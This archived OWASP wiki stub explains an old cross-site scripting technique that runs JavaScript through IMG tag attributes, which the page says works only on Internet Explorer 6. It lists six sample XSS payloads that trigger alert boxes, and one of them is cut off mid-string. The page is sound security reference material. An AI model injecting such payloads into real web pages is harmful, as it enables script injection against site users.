This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit

Script in IMG tags

Jump to: navigation, search


It is possible for an attacker to execute JavaScript via HTML IMG tags. This is also referred to as XSS (Cross-Site Scripting). However, this type of attack is no longer possible on modern browsers. It has been tested as working on Internet Explorer (IE) 6 running on Windows XP.


The following are methods an attacker can use in order to execute Javascript but will not be effective against modern browsers.

<IMG SRC="javascript:alert('Vulnerable');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says,
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

Related Threats

Related Attacks

XSS Attacks

Related Vulnerabilities

Related Countermeasures


This article is a stub. You can help OWASP by expanding it or discussing it on its Talk page.